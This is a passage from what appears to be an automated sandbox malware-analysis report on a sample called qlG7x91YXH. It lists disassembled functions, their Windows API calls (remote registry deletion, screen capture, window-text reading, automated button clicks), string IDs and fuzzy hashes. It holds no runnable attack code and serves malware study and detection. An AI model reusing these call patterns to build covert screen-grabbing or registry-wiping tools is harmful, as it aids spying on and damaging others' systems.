                                              • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00DE15FB
                                              • VarR8FromDec.OLEAUT32(?,?), ref: 00DE1657
                                              • VariantInit.OLEAUT32(?), ref: 00DE1708
                                              • SysFreeString.OLEAUT32(?), ref: 00DE178C
                                              • VariantClear.OLEAUT32(?), ref: 00DE17D8
                                              • VariantClear.OLEAUT32(?), ref: 00DE17E7
                                              • VariantInit.OLEAUT32(00000000), ref: 00DE1823
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                                              • String ID: %4d%02d%02d%02d%02d%02d$Default
                                              • API String ID: 1234038744-3931177956
                                              • Opcode ID: a623b80b2ec912c2bfed7506d4bed0141d28d4724900f6a05decdbeda8e84821
                                              • Instruction ID: 34882b6418e38f4f1b8a4df5b678fa16daee4b364b8cc7a8a74a7cc5976365d0
                                              • Opcode Fuzzy Hash: a623b80b2ec912c2bfed7506d4bed0141d28d4724900f6a05decdbeda8e84821
                                              • Instruction Fuzzy Hash: 03D1DC76B00245EBDB01BF66D885BADB7B5FF44700F24855AE886AB184DB30EC84DB71
                                              Function 00DFB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFB6F4
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFB772
                                              • RegDeleteValueW.ADVAPI32(?,?), ref: 00DFB80A
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB87E
                                              • RegCloseKey.ADVAPI32(?), ref: 00DFB89C
                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00DFB8F2
                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFB904
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFB922
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DFB983
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFB994
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 146587525-4033151799
                                              • Opcode ID: b67e767ba03ecb03c384385f80a33925589a9216f569ee95bbd72c5e8818a398
                                              • Instruction ID: 80562c3d03429b384feade8840153cedb9aaf8ab79512e6a457a27af47fbc186
                                              • Opcode Fuzzy Hash: b67e767ba03ecb03c384385f80a33925589a9216f569ee95bbd72c5e8818a398
                                              • Instruction Fuzzy Hash: 25C18B30204205AFD710DF24C495F2ABBE5EF84318F69C55DE69A8B2A2DB71E845CFA1
                                              Function 00DF255C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDC.USER32(00000000), ref: 00DF25D8
                                              • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00DF25E8
                                              • CreateCompatibleDC.GDI32(?), ref: 00DF25F4
                                              • SelectObject.GDI32(00000000,?), ref: 00DF2601
                                              • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 00DF266D
                                              • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00DF26AC
                                              • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 00DF26D0
                                              • SelectObject.GDI32(?,?), ref: 00DF26D8
                                              • DeleteObject.GDI32(?), ref: 00DF26E1
                                              • DeleteDC.GDI32(?), ref: 00DF26E8
                                              • ReleaseDC.USER32(00000000,?), ref: 00DF26F3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                              • String ID: (
                                              • API String ID: 2598888154-3887548279
                                              • Opcode ID: d882e7931ddf6f6e644ac675c2387cb6abeaeab83c07fc11ed99ed89231a4e69
                                              • Instruction ID: e1c36ebbb8129edc334210181e316db323d92547ef57cf6c23b8989a0030d526
                                              • Opcode Fuzzy Hash: d882e7931ddf6f6e644ac675c2387cb6abeaeab83c07fc11ed99ed89231a4e69
                                              • Instruction Fuzzy Hash: 2E61F275D00219EFCF04CFA8D884AAEBBB5FF48310F208529EA55B7250D771A951CFA0
                                              Function 00DADA5D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 00DADAA1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD659
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD66B
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD67D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD68F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6A1
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6B3
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6C5
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6D7
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6E9
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD6FB
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD70D
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD71F
                                                • Part of subcall function 00DAD63C: _free.LIBCMT ref: 00DAD731
                                              • _free.LIBCMT ref: 00DADA96
                                                • Part of subcall function 00DA29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000), ref: 00DA29DE
                                                • Part of subcall function 00DA29C8: GetLastError.KERNEL32(00000000,?,00DAD7D1,00000000,00000000,00000000,00000000,?,00DAD7F8,00000000,00000007,00000000,?,00DADBF5,00000000,00000000), ref: 00DA29F0
                                              • _free.LIBCMT ref: 00DADAB8
                                              • _free.LIBCMT ref: 00DADACD
                                              • _free.LIBCMT ref: 00DADAD8
                                              • _free.LIBCMT ref: 00DADAFA
                                              • _free.LIBCMT ref: 00DADB0D
                                              • _free.LIBCMT ref: 00DADB1B
                                              • _free.LIBCMT ref: 00DADB26
                                              • _free.LIBCMT ref: 00DADB5E
                                              • _free.LIBCMT ref: 00DADB65
                                              • _free.LIBCMT ref: 00DADB82
                                              • _free.LIBCMT ref: 00DADB9A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction ID: 646382d0471e58c1f6c3bd7b8937fbce5d616fcffafecba55248b7af683ca432
                                              • Opcode Fuzzy Hash: 18059647d9a3c790b67114ff89ac54d5239e64553fb1bec7b141c78de260b7cd
                                              • Instruction Fuzzy Hash: EC318D326443049FEB61AA39E845B6B77EAFF12710F294819E48AD7591DF30EC40CB31
                                              Function 00DD365B Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 267windowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD369C
                                              • _wcslen.LIBCMT ref: 00DD36A7
                                              • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00DD3797
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD380C
                                              • GetDlgCtrlID.USER32(?), ref: 00DD385D
                                              • GetWindowRect.USER32(?,?), ref: 00DD3882
                                              • GetParent.USER32(?), ref: 00DD38A0
                                              • ScreenToClient.USER32(00000000), ref: 00DD38A7
                                              • GetClassNameW.USER32(?,?,00000100), ref: 00DD3921
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD395D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout_wcslen
                                              • String ID: %s%u
                                              • API String ID: 4010501982-679674701
                                              • Opcode ID: c4f509f83ac926dad6c176d509272ca5388e95f86e93030e4fa4130e6cdb8dfc
                                              • Instruction ID: bfcfab8b0faee9c47420adb0444c850cf36bd93014f6b2282362e9f46bdf7c1e
                                              • Opcode Fuzzy Hash: c4f509f83ac926dad6c176d509272ca5388e95f86e93030e4fa4130e6cdb8dfc
                                              • Instruction Fuzzy Hash: 2591F871204706AFD715DF24C895FAAF7A8FF44350F04462AF999D2290DB31EA49CBB2
                                              Function 00DD4954 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 253COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4994
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD49DA
                                              • _wcslen.LIBCMT ref: 00DD49EB
                                              • CharUpperBuffW.USER32(?,00000000), ref: 00DD49F7
                                              • _wcsstr.LIBVCRUNTIME ref: 00DD4A2C
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4A64
                                              • GetWindowTextW.USER32(?,?,00000400), ref: 00DD4A9D
                                              • GetClassNameW.USER32(00000018,?,00000400), ref: 00DD4AE6
                                              • GetClassNameW.USER32(?,?,00000400), ref: 00DD4B20
                                              • GetWindowRect.USER32(?,?), ref: 00DD4B8B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                              • String ID: ThumbnailClass
                                              • API String ID: 1311036022-1241985126
                                              • Opcode ID: d17e74dce1e6aafe2875f7e01f0537f9f60a6fa926e0521f42076e1cc064cffe
                                              • Instruction ID: bf17995617dd2b6ea49dd734f88b5b06d390da7819bc17711a934fbba81165e3
                                              • Opcode Fuzzy Hash: d17e74dce1e6aafe2875f7e01f0537f9f60a6fa926e0521f42076e1cc064cffe
                                              • Instruction Fuzzy Hash: 9591DE310042059FDB04CF14C985BAAB7E8FF54714F08856BFD899A296EB31ED49CBB1
                                              Function 00DFCC34 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCC64
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00DFCC8D
                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD48
                                                • Part of subcall function 00DFCC34: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00DFCCAA
                                                • Part of subcall function 00DFCC34: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00DFCCBD
                                                • Part of subcall function 00DFCC34: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00DFCCCF
                                                • Part of subcall function 00DFCC34: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00DFCD05
                                                • Part of subcall function 00DFCC34: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00DFCD28
                                              • RegDeleteKeyW.ADVAPI32(?,?), ref: 00DFCCF3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                              • API String ID: 2734957052-4033151799
                                              • Opcode ID: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction ID: 853ed75dd0d504e64cd3b0067a0e5d5ae797ade0addcd79572430a923c36b096
                                              • Opcode Fuzzy Hash: d43043300fcf7759bbd6b2a54a921e9ad875192051f56221101513b0ad11751a
                                              • Instruction Fuzzy Hash: 8C318D7190112CBFDB208B91DD88EFFBB7CEF45750F154265BA06E2240DB309A89DAB0
                                              Function 00DDE6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • timeGetTime.WINMM ref: 00DDE6B4
                                                • Part of subcall function 00D8E551: timeGetTime.WINMM(?,?,00DDE6D4), ref: 00D8E555
                                              • Sleep.KERNEL32(0000000A), ref: 00DDE6E1
                                              • EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 00DDE705
                                              • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00DDE727
                                              • SetActiveWindow.USER32 ref: 00DDE746
                                              • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00DDE754
                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 00DDE773
                                              • Sleep.KERNEL32(000000FA), ref: 00DDE77E
                                              • IsWindow.USER32 ref: 00DDE78A
                                              • EndDialog.USER32(00000000), ref: 00DDE79B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                              • String ID: BUTTON
                                              • API String ID: 1194449130-3405671355
                                              • Opcode ID: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction ID: c7ab268b0b841188a472224f90c112483798146b9520702774cb47480cf67547
                                              • Opcode Fuzzy Hash: bfac60d44e5d2da68d60312f9bf6331bbe3eb77ccedf7196cfebbb7f68fc2cf5
                                              • Instruction Fuzzy Hash: C521F674200200BFEB106F33EC89A363B69F755748F65156AF505A52A1DB72EC8D9B31
                                              Function 00DDE9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00DDEA5D
                                              • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00DDEA73
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDEA84
                                              • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00DDEA96
                                              • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00DDEAA7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: SendString$_wcslen
                                              • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                              • API String ID: 2420728520-1007645807
                                              • Opcode ID: bc3a18e82e3acea4f1826a57aa3508f710cbdda8a913eef0d102e16d42b5903e
                                              • Instruction ID: 6d0376fe64c26a678c20b906671264d7183753fba4044dd77c5eb8aa62040464
                                              • Opcode Fuzzy Hash: bc3a18e82e3acea4f1826a57aa3508f710cbdda8a913eef0d102e16d42b5903e
                                              • Instruction Fuzzy Hash: 9C115131A9026979D720B7B6DC4AEFF6F7CEBD1B00F04542A7415A60D1EF704945C5B0
                                              Function 00DD5CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetDlgItem.USER32(?,00000001), ref: 00DD5CE2
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5CFB
                                              • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00DD5D59
                                              • GetDlgItem.USER32(?,00000002), ref: 00DD5D69
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5D7B
                                              • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00DD5DCF
                                              • GetDlgItem.USER32(?,000003E9), ref: 00DD5DDD
                                              • GetWindowRect.USER32(00000000,?), ref: 00DD5DEF
                                              • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00DD5E31
                                              • GetDlgItem.USER32(?,000003EA), ref: 00DD5E44
                                              • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00DD5E5A
                                              • InvalidateRect.USER32(?,00000000,00000001), ref: 00DD5E67
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Window$ItemMoveRect$Invalidate
                                              • String ID:
                                              • API String ID: 3096461208-0
                                              • Opcode ID: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction ID: ef00aee3ac0f77eabb6d62c95607067ba57f0d2aea87d3b54b608336338ce0af
                                              • Opcode Fuzzy Hash: 6fb1e8f26fa3ebce0e9f9ef5e427afde8323938f5ac722a5c0719e1382790f04
                                              • Instruction Fuzzy Hash: 7B514170B00605AFDF18CF69DD89AAE7BB5FB48700F248229F515E7294D7719E44CB60
                                              Function 00D89838 Relevance: 18.1, APIs: 12, Instructions: 137COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D89944: GetWindowLongW.USER32(?,000000EB), ref: 00D89952
                                              • GetSysColor.USER32(0000000F), ref: 00D89862
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ColorLongWindow
                                              • String ID:
                                              • API String ID: 259745315-0
                                              • Opcode ID: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction ID: 1fef07c00c9c1fda81f0fb6a79e11c356f1e0d6dadaccae263a2c163f8753458
                                              • Opcode Fuzzy Hash: 5b1e8fc5014cced86511f8d163d3aa4dffb2858aa4fb1b065a81037b34d9c1bf
                                              • Instruction Fuzzy Hash: A7419D31104641AFDB206F399C98BB97BB5EB06320F2C461AF9E2971E1C7319C82DB30
                                              Function 00DD96E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,00DBF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00DD9717
                                              • LoadStringW.USER32(00000000,?,00DBF7F8,00000001), ref: 00DD9720
